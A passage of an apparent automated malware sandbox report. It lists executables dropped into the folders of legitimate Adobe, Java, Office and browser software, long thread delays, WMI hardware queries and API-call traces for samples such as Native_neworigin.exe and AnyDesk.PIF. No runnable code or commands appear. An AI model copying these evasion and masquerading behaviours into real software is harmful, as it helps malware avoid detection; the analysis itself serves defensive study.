                      Source: C:\Users\Public\Libraries\aymtmquJ.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                      Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
                      Source: C:\Users\Public\alpha.exeAPI coverage: 8.5 %
                      Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
                      Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
                      Source: C:\Users\Public\alpha.exeAPI coverage: 9.7 %
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7488Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2832Thread sleep count: 3758 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -199740s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -99720s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -99570s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -99435s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -99219s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -98582s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -98438s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -98304s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -98168s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -98045s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97927s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97781s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97664s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97532s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2832Thread sleep count: 435 > 30
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97182s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97026s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96812s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96343s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -99745s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -99602s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -99377s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -99201s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -99020s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -98882s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -98763s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -98611s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -98203s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97675s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97541s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97334s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -97127s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96946s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96835s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96705s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96577s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96462s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96340s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -96227s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1200000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1199861s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1199737s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1199475s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1198803s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1198580s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1198358s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1198228s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1198114s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1197990s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1197862s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1197676s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1197542s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2588Thread sleep time: -1197409s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 7592Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\alg.exe TID: 7992Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\alg.exe TID: 7872Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 4202 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5908Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 4460Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif TID: 5784Thread sleep time: -40000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeLast function: Thread delayed
                      Source: C:\Windows\System32\alg.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeLast function: Thread delayed
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,9_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,9_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,9_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00007FF706EB1560
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF706EB1560
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,12_2_00007FF627ABC6F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,12_2_00007FF627B2234C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B23100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,12_2_00007FF627B23100
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B210C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,12_2_00007FF627B210C4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B26F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,12_2_00007FF627B26F80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B03674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,12_2_00007FF627B03674
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A8D440
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,12_2_00007FF627ACD4A4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,12_2_00007FF627ACB3D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,12_2_00007FF627AC5E58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,12_2_00007FF627ACDBC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B21B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,12_2_00007FF627B21B04
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B219F8 #359,FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF627B219F8
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,15_2_02DF5908
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,16_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,16_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,16_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00007FF706EB1560
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,17_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,17_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,17_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,17_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00007FF706EB1560
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,12_2_00007FF627B0511C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99870
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99720
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99570
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99435
